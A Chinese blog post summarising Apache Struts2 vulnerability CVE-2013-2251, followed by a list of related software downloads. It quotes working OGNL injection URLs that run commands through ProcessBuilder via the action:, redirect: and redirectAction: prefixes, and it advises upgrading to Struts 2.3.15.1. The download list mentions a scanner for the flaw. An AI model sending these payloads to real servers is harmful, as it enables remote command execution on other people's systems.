Struts官网又公布了一个涉及Struts 2.0.0 - Struts 2.3.15的漏洞,CVE-2013-2251,并给出了漏洞测试的方法:
简单表达式: - the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
命令执行:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
详情页面:http://struts.apache.org/release/2.3.x/docs/s2-016.html
此漏洞一出,昨天(2013年7月17日)乌云漏洞平台上提交Struts2相关漏洞的数量剧增:
由于国内使用Struts2的网站太多,连一些大站也中招,比如淘宝、腾讯、网易等,官网给出的解决方案为:强烈建议升级到Struts 2.3.15.1!
分享到:
相关推荐
mina-core-2.0.0-RC1.jar,mina-filter-compression-2.0.0-RC1.jar,mina-transport-apr-2.0.0-RC1.jar
本资源是spark-2.0.0-bin-hadoop2.6.tgz百度网盘资源下载,本资源是spark-2.0.0-bin-hadoop2.6.tgz百度网盘资源下载
struts2-core-2.0.1.jar, struts2-core-2.0.11.1.jar, struts2-core-2.0.11.2.jar, struts2-core-2.0.11.jar, struts2-core-2.0.12.jar, struts2-core-2.0.14.jar, struts2-core-2.0.5.jar, struts2-core-2.0.6.jar,...
tensorflow-2.0.0-cp37-none-linux_armv7l.whl
资源里面包含 nacos-server-2.0.0-ALPHA.1.tar.gz nacos-server-2.0.0-ALPHA.1.zip
triton-2.0.0-cp310-cp310-win_amd64.whl
《Struts 2.0.0 - Struts 2.3.14.1 URL及A标签远程命令执行漏洞探测 V1.1》 使用说明: 运行EXE程序,输入扫描站点的任意一个URL入口链接地址, 若提示扫描是否包含顶级域名下的所有页面,根据提示输入即可。 ...
spark-2.0.0-bin-hadoop2.7.tgz.zip 提示:先解压再使用,最外层是zip文件
tensorflow-2.0.0-cp37-cp37m-win_amd64.whl tensorflow-2.0.0-cp37-cp37m-win_amd64.whl
apache-hive-2.0.0-bin.tar
这是struts-2.0.0中lib的jar压缩包,我也是网上下载的
linuxqq_2.0.0-b2-1084_x86_64.rpm
mina-core-2.0.0-M6.jar mina-example-2.0.0-M6.jar mina-filter-codec-netty-2.0.0-M6.jar mina-filter-compression-2.0.0-M6.jar mina-integration-beans-2.0.0-M6.jar mina-integration-jmx-2.0.0-M6.jar mina-...
linuxqq_2.0.0-b2-1084_x86_64.sh
linuxqq_2.0.0-b2-1089_amd64.deb
SenchaSDKTools-2.0.0-Beta-windows
赠送原API文档:kafka-clients-2.0.0-javadoc.jar; 赠送源代码:kafka-clients-2.0.0-sources.jar; 赠送Maven依赖信息文件:kafka-clients-2.0.0.pom; 包含翻译后的API文档:kafka-clients-2.0.0-javadoc-API文档...
mina-core-2.0.0-RC1-sources.jar
linux下bazel2.0.0,适合tensorflow-master编译。解决在github上该文件难以下载的问题。